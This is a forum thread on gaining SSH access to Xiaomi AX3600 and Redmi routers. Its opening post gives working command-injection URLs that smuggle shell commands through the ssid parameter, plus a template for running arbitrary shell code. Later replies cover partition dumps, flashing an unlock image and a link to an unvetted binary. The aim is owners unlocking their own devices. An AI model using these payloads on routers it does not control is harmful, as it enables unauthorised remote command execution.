Xiaomi ax3600 ssh guide

Gaojianli · May 31, 2020, 4:02am

Half a year has passed since the release of the xiaomi wifi6 router ax3600. And finally we can get the ssh access on it.
The origin exploit is found by LonGDikE from Chinese Enshan forum.
Here are the steps:

Downgrade your router to 1.0.17 version:http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r3600/miwifi_r3600_firmware_5da25_1.0.17.bin
Login in to your router and get the STOK like follwing:
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/web/home#router
Access these urls in browser:

(nvram set ssh_en=1;nvram commit)
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bnvram%20set%20ssh%5Fen%3D1%3B%20nvram%20commit%3B

(sed -i 's/channel=.*/channel="debug"/g' /etc/init.d/dropbear)
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bsed%20-i%20's/channel=.*/channel=%5C%22debug%5C%22/g'%20/etc/init.d/dropbear%3B

(/etc/init.d/dropbear start)
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B/etc/init.d/dropbear%20start%3B

If everything is ok ,the ssh is enabled now.

image730×464 9.51 KB

PS: You can excute any shell code like this:
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B<your encoded shell code>%3B

Gingernut · July 26, 2020, 4:52am

Did your Redmi AX5 have version 1.0.16 installed when you received it or did you downgrade?

I'm wondering how to find the download links for previous versions for the Mi AX1800.

Nishayume · July 26, 2020, 7:42am

Yes recieved with 1.0.16 in ax5.

If find something for AX1800 i talk to you

Gingernut · July 26, 2020, 7:48am

I think I need to downgrade to 1.0.34, the link is available on right.com.cn forum but I'm not a member, maybe someone with access could post it here.

Edit: No need to downgrade, gained SSH access to the Mi AX1800 running latest 1.0.336 firmware after a reset and setup in router mode, in AP mode is didn't work.

Just_Some_Guy · July 28, 2020, 11:51am

I also have the AX5 and would love to load OpenWrt on it. Is there anything I can do to assist?

cjom · July 31, 2020, 10:18pm

Looks like SSH can be permanent but I'm having trouble with the chinese forum... if someone could translate all the steps here, please...

"AX3600 permanently open telnet-ssh, you can upgrade and restore at will"
https://www.right.com.cn/forum/thread-4045295-1-1.html

edit: I managed to translate the post, but I can't get the attachment

Step 1: Back up Xiaomi's bdata partition, which contains the router's sn code ssh and other information. Before operation, confirm the partition details of the router:

root@XiaoQiang:~# cat /proc/mtd | grep bdata

mtd9: 00080000 00020000 "bdata"

You can see that my bdata partition is mtd9. Then enter the following command:

nanddump -f /tmp/bdata_mtd9.img /dev/mtd9

After the backup is complete, copy the bdata_mtd9.img file to the computer in the /tmp directory. You can use the winscp software to copy directly, or use the scp command to copy
After the copy is completed, for safety reasons, I suggest to make another copy and save it, just in case

KaMyKaSii · August 12, 2020, 7:55pm

I don't understand how just backing up the partition can make ssh permanent. How to restore the partition (and enable ssh) if you no longer have access to ssh?

heidarren · August 25, 2020, 4:13pm

You actually need a file, which will hack and unlock mtd to gain access of telnet permanent, and start ssh service via command after. I got the file, but dunno how to upload here

KaMyKaSii · August 25, 2020, 4:28pm

You can upload it anywhere (like gofile) and send the link here
https://gofile.io/welcome

heidarren · August 25, 2020, 7:30pm

https://gofile.io/d/Lb8nKH

KaMyKaSii · August 26, 2020, 4:29pm

Can you tell from where you got the binary file and if there is any version for the Redmi AX5 and Xiaomi AX1800?

perceival · August 27, 2020, 4:47am

What am I supposed to do with that file after performing mtd9 backup?

reglisse69 · August 31, 2020, 4:40pm

Hi,

Worked on Redmi AX5 with 1.0.26 firmware.

Thanks

perceival · September 2, 2020, 10:47am

Does anybody came across following problem?

root@ax3600:~# mtd write /tmp/bdata_mtd9.img bdata
Could not open mtd device: bdata
Can't open device for writing!

I do follow procedure description but all the time getting the above.

Gingernut · September 2, 2020, 11:51am

mtd partitions are usually read only.

perceival · September 2, 2020, 2:41pm

That I understand however hack from this forum: https://www.right.com.cn/forum/thread-4045295-1-1.html contains flashing crash partition with the file that is supposed to allow writing to mtd9 after reboot. Unfortunately that seem not to work for me and I an wondering what the reason might be.

barnamacko · September 19, 2020, 12:09pm

There is a good description here, how to get a permanent ssh after firmware upgrade:
https://www.5v13.com/mesh/26276.html#

However I also stuck, with write back step.

root@XiaoQiang:~# mtd write /tmp/bdata_mtd9.img bdata
Could not open mtd device: bdata
Can't open device for writing!

There is anyone figured out how to solve it?

The crash_unlock.img is written sucessfuljy, at least seems to it.

root@XiaoQiang:~# mtd write /tmp/crash_unlock.img crash
Unlocking crash ...

Writing from /tmp/crash_unlock.img to crash ...
root@XiaoQiang:~#

Gingernut · September 19, 2020, 12:21pm

You normally need to install the kmod-mtd-rw package to be able to write mtd partitions.

barnamacko · September 19, 2020, 1:33pm

Yeah, actually the crash_unlock.img file supposed to get the mtd partitions writeable.
I also tried the way as kmod-mtd-rw package wasn not available at all at https://downloads.openwrt.org/snapshots/packages/aarch64_cortex-a53/packages/
I got this
https://mgmt.saar.freifunk.net/openwrt/releases/18.06.8/targets/mvebu/cortexa53/kmods/4.14.171-1-e2d32c880dc65b62ec0410e12611f89c/kmod-mtd-rw_4.14.171+git-20160214-1_aarch64_cortex-a53.ipk
then copy to the router /tmp folder, then install to the memory

root@XiaoQiang:~# opkg install --nodeps --dest ram /tmp/kmod-mtd-rw_4.14.171+git
-20160214-1_aarch64_cortex-a53.ipk
Installing kmod-mtd-rw (4.14.171+git-20160214-1) to ram...
Configuring kmod-mtd-rw.
root@XiaoQiang:~# insmod mtd-rw i_want_a_brick=1
Failed to find mtd-rw. Maybe it is a built in module ?

But still no luck!

slh · September 20, 2020, 8:36pm

Kernel modules must match the running kernel exactly (not just the same upstream version, but also the same patches and configuration), there is only very little leeway. Non-matching kernel versions usually just result in the module not being considered, same version but non-matching patches/ config likely causes crashes.

In order to match, you'd need the 4.4.60 based OEM kernel, but you don't have its source.